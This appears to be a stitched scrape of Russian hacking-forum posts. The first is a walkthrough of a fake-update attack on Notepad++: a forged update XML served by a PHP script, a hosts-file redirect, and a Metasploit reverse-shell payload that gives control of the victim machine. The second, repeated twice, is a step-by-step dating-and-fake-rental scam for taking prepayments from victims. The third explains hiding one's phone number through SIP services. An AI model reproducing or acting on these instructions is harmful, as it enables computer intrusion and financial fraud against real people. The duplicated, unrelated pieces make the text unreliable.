Search the Community

В данной статье я хочу поговорить о теме которая меня давно интересует, а именно фейковое обновлении ПО. Мне вообще интересна тема MITM а в частности как проводить атаки внутри сети. Одним из векторов атаки является то самое фейковое обновление ПО. Примерно год назад мне попалась на глаза программа evilgrade, сразу загорелся желанием разобраться как она работает. Попробовал разобрать с наскоку но что то пошло не так и я забил Сегодня я сново вернулся к этой теме и в этот раз я добился результат. Оговорю сразу, я не даю вам четкие инструкции как вам провести данную атаку или написать код чтобы автоматизировать процесс, я опишу методологию того как это происходит и покажу пример который наглядно покажет о чем идет речь. Суть данного материала показать как работает данная атака на примитивном уровне. Давайте выйдем за рамки скрипт-кидди и повысим свой уровень знаний в данной области Бездумно использовать готовый софт могут все, а понять как он работает далеко не многие. Теория: Прежде чем углубиться в атаку давайте разберем механизм обновление ПО. Этапы обновление ПО: Отправляем на сервер запрос для проверки обновления (это может делать как сама программа в автоматическом режиме так и выполнен запрос в ручную) Получаем ответ от сервера Обработка ответа (если обновление есть то устанавливаем если нет то сообщаем о том что программа не имеет обновлений)После того как у нас сформировалось понимание того как проходит процесс обновление ПО мы можем сформировать этапы атаки. Этапы проведения атаки: Определить запрос отправленный на сервер обновления Посмотреть ответ который прислала сервер Понимаем свой сервер Реализовать атаку типа DNS Spoofing на адрес сервера обновлений Сформировать свой ответ на основе полученного ответа в пункте 2Когда этапы атаки обозначены можно приступить к реализации. Пока что на уровне теории можете не особо понятно о чем идет речь но скоро мы перейдем к примеру который наглядно покажет что к чему. Возьмем для примера программу Notepad++, она идеально подойдет для того чтобы наглядно показать данный вектор атаки. Практика: Для того чтобы мы могли выполнить все этапы атаки нам понадобиться следующие программы: Notepad++XAMPPWiresharkНачнем с установки Notepad++. После того как мы установили программу надо проверить ее обновление. Находим знак ? нажимаем на него в выпадающем меню выбираем “Обновить Notepad++”. Появляется окно которое нам предлагает скачать обновление. Это нам как раз и надо. Нажимаем отмена, открываем Wireshark. Выбираем сетевой адаптер (тут мог выразиться не точно). Выставляем фильтр HTTP. Повторяем процесс запроса но обновления ждем пару секунд останавливаем Wireshark. И начинаем смотреть перехваченные пакеты. В поле info мы можем заметить что есть GET запрос с URL который начинается на update. Просмотров данный запрос более детально мы видим Full request который ведет на URL notepad-plus-plus.org. Чтобы убедиться что это то что нам надо давайте перейдем на полный URL http://notepad-plus-plus.org/update/getDownloadUrl.php?version=6.0. В ответ мы получим XML который говорит нам о том что есть новое обновление. yes 7.5.9 http://notepad-plus-plus.org/repository/7.x/7.5.9/npp.7.5.9.Installer.exe На этом этапе у нас есть мы нашли интересующий нас запрос и узнали какой требуются ответ чтобы его распознала программа. На этом сбор данных закончен приступим к атаке. Так как тест проводиться в лабораторных условия я некоторые моменты упростил а именно DNS Spoofing и поднятие сервера в локальной сети. Третий и четвертый пункт будут проводиться на атакуемой машине но это не столь важно так как не вредит чистоте теста. Устанавливаем XAMPP. Включаем Apache. Переходим в каталог где лежит сайт по умолчанию C:\xampp\htdocs. Создаем там две директории update и repository. Каталог update обязателен так как он есть в URL который запрашивает обновление там будет лежать файл getDownloadUrl.php. Директория repository не обязателен так как мы сами указываем откуда загружаться payload в XML который будем отдавать в ответ на запрос но для красоты и порядка положим именно туда нашу пользовательскую нагрузку. Переходим в каталог update и создаем файл getDownloadUrl.php со следующим содержанием. <?php header('Content-type: text/xml'); $xml = yes 7.5.9 http://notepad-plus-plus.org/repository/payload.exe XML; echo $xml; Данный код выводит все тот же XML который мы получили ранения с одним изменением. В тэг Location мы установили свой путь к файлу с payload который находиться в директории repository. Payload я создал на Kali. Пример как это делать можно посмотреть в статье [Metasploit] устанавливаем обратное TCP соединение через ngrok. После того как вы получили exe файл положите его в каталог repository. Теперь давайте перейдем по адресу http://localhost/repository/ и убедимся что там лежит на payload файла. А также проверим отдается ли наш сконфигурированный XML по адресу http://localhost/update/getDownloadUrl.php. Если у вас все сходиться с примерами на скриншотах тогда вы делаете все правильно. Осталось совсем немного) а именно надо заставить идти запросы на наш сервер. Тут мы можем прибегнуть к DNS Spoofing но как я говорил ранее мы упростим данный шаг. Идем в каталог etc который находиться по пути C:\Windows\System32\drivers\etc и добавляем в конец файл hosts 127.0.0.1 notepad-plus-plus.org. Тем самым мы говорим нашей системе чтобы все запросы которые идут на notepad-plus-plus.org шли на locolhost. На этом подготовка закончена осталось проверить. Идем в Notepad++ запускаем проверку обновления. Соглашаемся скачать обновления. После того как обновление скачается появиться еще одно окно. Соглашаемся. Notepad++ закроется а наш payload выполнится. Вот мы и получили контроль над машиной в локальной сети незаметно для атакуемого пользователя. Я надеюсь что статья была полезной и вы вынесли для себя что то новое. Данный вид атаки сработает далеко не со всеми программами. Но с какой то частью точно. Как поступить с полученными знаниями зависит только от вас.

Всем привет, сегодня я бы хотел рассказать вот о способе заработка на фейковых свиданиях. Не буду много говорить, думаю перейдем сразу к сути данного способа. Первым делом что нам понадобится – это зарегистрировать аккаунт девушки в социальной сети, желательно вконтакте. Если вам лень, то можете купить уже готовый аккаунт, но если вы не хотите вкладывать пару рублей, то первый вариант вам подойдет больше. Вам будет необходимо как можно лучше оформить и заполнит аккаунт красивыми фотками. Никой эротики и голых фотографий. Максимум что вы можете позволить в этом плане, это фото в купальнике, платье и прочем. Вы не должны никак выделяться от других. Второе что вам понадобится – это иметь телефон, а также левую сим-карту, ну или можете воспользоваться подменой номера, об этом я уже рассказывал в своей статье. Если же вы не хотите использовать этот способ, то вы можете просто по дешевке купить симку в переходе. Итак, подготовка завершилась, теперь начнем действовать. Нам необходимо зайти в группы предназначенных для знакомств, в принципе можете выбирать и группы с название “Секс без обязательств”, после чего ждем наших жертв. Когда кто-то напишет вам, вы должны будете поболтать, возможно покидать какие-то фото. После этого, с вами безусловно захотят встретится, но в случае этого мы сразу отвечаем им, что у вас встретиться не получиться под каким-либо предлогом. Например, “Я с родителями живу, а к тебе поехать не могу, так как мы еще не так хорошо знакомы”, это будет вынуждать его снимать квартиру на короткий срок. После того, как он клюнул, нам нужно будет создать на любом сервисе объявление о сдаче квартиры на сутки, после чего загружаем фейковые фотки и выставляем цену меньше обычной, а номер для контактов даем тот, который вы до этого получили. После этого вам будет необходимо от лица девушки скинуть это объявление вашей жертве и навешать лапши о том, какая эта квартира прикольная и классная, какие красивые виды и где находится. Если и это выходит, то дальше мы уже под видом арендодателя берем трубку, когда вам позвонят на счет квартиры. И начинаем говорить: “Конечно, сдаю, но снять ее хотят много кто, вы когда ходите? Сегодня вечером? К сожалению, туда уже хотели в это время люди заехать, но предоплату они так и не внесли, если вы сейчас предоплату внесете, то без проблем – выезжайте”. После этого оставляем данные, куда будут переведены деньги и нам этом все.

Всем привет, сегодня я бы хотел рассказать вот о способе заработка на фейковых свиданиях. Не буду много говорить, думаю перейдем сразу к сути данного способа. Первым делом что нам понадобится – это зарегистрировать аккаунт девушки в социальной сети, желательно вконтакте. Если вам лень, то можете купить уже готовый аккаунт, но если вы не хотите вкладывать пару рублей, то первый вариант вам подойдет больше. Вам будет необходимо как можно лучше оформить и заполнит аккаунт красивыми фотками. Никой эротики и голых фотографий. Максимум что вы можете позволить в этом плане, это фото в купальнике, платье и прочем. Вы не должны никак выделяться от других. Второе что вам понадобится – это иметь телефон, а также левую сим-карту, ну или можете воспользоваться подменой номера, об этом я уже рассказывал в своей статье. Если же вы не хотите использовать этот способ, то вы можете просто по дешевке купить симку в переходе. Итак, подготовка завершилась, теперь начнем действовать. Нам необходимо зайти в группы предназначенных для знакомств, в принципе можете выбирать и группы с название “Секс без обязательств”, после чего ждем наших жертв. Когда кто-то напишет вам, вы должны будете поболтать, возможно покидать какие-то фото. После этого, с вами безусловно захотят встретится, но в случае этого мы сразу отвечаем им, что у вас встретиться не получиться под каким-либо предлогом. Например, “Я с родителями живу, а к тебе поехать не могу, так как мы еще не так хорошо знакомы”, это будет вынуждать его снимать квартиру на короткий срок. После того, как он клюнул, нам нужно будет создать на любом сервисе объявление о сдаче квартиры на сутки, после чего загружаем фейковые фотки и выставляем цену меньше обычной, а номер для контактов даем тот, который вы до этого получили. После этого вам будет необходимо от лица девушки скинуть это объявление вашей жертве и навешать лапши о том, какая эта квартира прикольная и классная, какие красивые виды и где находится. Если и это выходит, то дальше мы уже под видом арендодателя берем трубку, когда вам позвонят на счет квартиры. И начинаем говорить: “Конечно, сдаю, но снять ее хотят много кто, вы когда ходите? Сегодня вечером? К сожалению, туда уже хотели в это время люди заехать, но предоплату они так и не внесли, если вы сейчас предоплату внесете, то без проблем – выезжайте”. После этого оставляем данные, куда будут переведены деньги и нам этом все.

Бывают такие ситуации, когда вам для чего-то нужно скрыть свой собственный номер телефона. А бывает даже такие ситуации, когда вам любой ценой нужно совершить звонок, но ни в коем случае не используя свой номер. Поэтому в данной статье я расскажу два простых способа, которые позволят скрыть номер вашего телефона и совершать под ним звонки. Для начала, я вам скажу, какие два способа мы будем использовать для примера в этой статье: 1. Этот способ является бесплатным, однако имеет один небольшой недостаток, воспользоваться им можно только на телефонах с операционной системой Android. 2. Данный же способ уже является платным, который лишен предыдущего недостатка, поэтому использовать его можно абсолютно с любого устройства. Первый способ Рассказ мы начнем как раз-таки с бесплатного. Для начала работы вам будет необходимо зарегистрироваться на сайте ruvoip.net. Там вы будете должны заполнить все необходимые данные, а также ввести свой настоящий номер мобильного телефона, куда придет код подтверждения регистрации. После того как вы это завершите, вам нужно будет перейти в Play Market и скачать специальное приложение – Zoiper. После установки запускаем и вводим свой логин и пароль, который вы создали при регистрации на сайте, который мы указали выше. После входа нам нужно выбрать имя хоста, ставим – talk37.ru На этом все, теперь вы можете совершать звонки с любого доступного номера. Второй способ Теперь мы рассмотрим платный способ, который подойдет для любых устройств. Однако после слова “платный” уже никто не собирается им пользоваться, но право быть он имеет. Итак, начнем. Нам нужно перейти на сайт sip-system.com, где вы должны будете скачать приложение Linphone с Play Market или App Store. Когда закончите установку, запускаем приложении и выбираем “Использовать SIP аккаунта”. После этого вам нужно будет пройти регистрацию указав ваши данные, а также записав в строку домена – sip.sip-system.com, а транспорт – UDP. Когда вы завершите регистрацию, вам нужно авторизоваться. Готово, теперь вы также можете скрыть свой номер и совершать звонки в любую точку. Однако, я считаю, что лучше всего использовать первый способ, так как это приложение имеет намного больше багов, чем то, что мы рассматривали в первом. Да и стабильность работы не так высока.